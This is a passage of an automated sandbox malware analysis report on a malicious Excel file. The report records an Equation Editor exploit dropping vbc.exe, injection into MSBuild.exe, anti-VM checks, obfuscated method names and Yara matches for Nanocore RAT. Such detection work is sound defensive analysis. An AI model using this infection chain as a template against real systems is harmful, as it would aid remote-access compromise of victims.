        Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsxA0F3.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nshF115.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsx542B.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsnBAE9.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exeJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsmCF90.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nshD819.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsh3B1F.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsm1EE8.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsn937.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsxD645.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nss87C.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsn2761.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsn86CF.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsc6BC0.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsnEF9F.tmp\lk95ejdjuy.dllJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: Original title deed.xlsxStream path 'EncryptedPackage' entropy: 7.99982473669 (max. 8.0)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2404Thread sleep time: -360000s >= -30000s
        Source: C:\Users\Public\vbc.exeCode function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0040659C FindFirstFileA,FindClose,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_004027A1 FindFirstFileA,
        Source: vbc.exe, 00000006.00000003.2163349232.0000000000553000.00000004.00000001.sdmpBinary or memory string: Vmciwave.dll
        Source: vbc.exe, 0000000A.00000002.2201230427.00000000005D4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: C:\Users\Public\vbc.exeCode function: 4_2_10001000 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 4_2_003D18AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 4_2_003D1AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 6_2_02041AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 6_2_020418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 8_2_01E418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 8_2_01E41AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 10_2_00581AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 10_2_005818AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 12_2_00431AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 12_2_004318AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 14_2_027418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 14_2_02741AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 16_2_005D1AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 16_2_005D18AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 18_2_00531AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 18_2_005318AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 20_2_01F018AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 20_2_01F01AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 22_2_01F418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 22_2_01F41AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 24_2_00541AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 24_2_005418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 26_2_027418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 26_2_02741AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 28_2_00431AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 28_2_004318AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 30_2_027418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 30_2_02741AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 32_2_003F18AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 32_2_003F1AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 34_2_10001000 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 34_2_01D61AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 34_2_01D618AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 4_2_1000147A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
        Source: C:\Users\Public\vbc.exeCode function: 34_2_1000147A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: unknown unknown
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORY
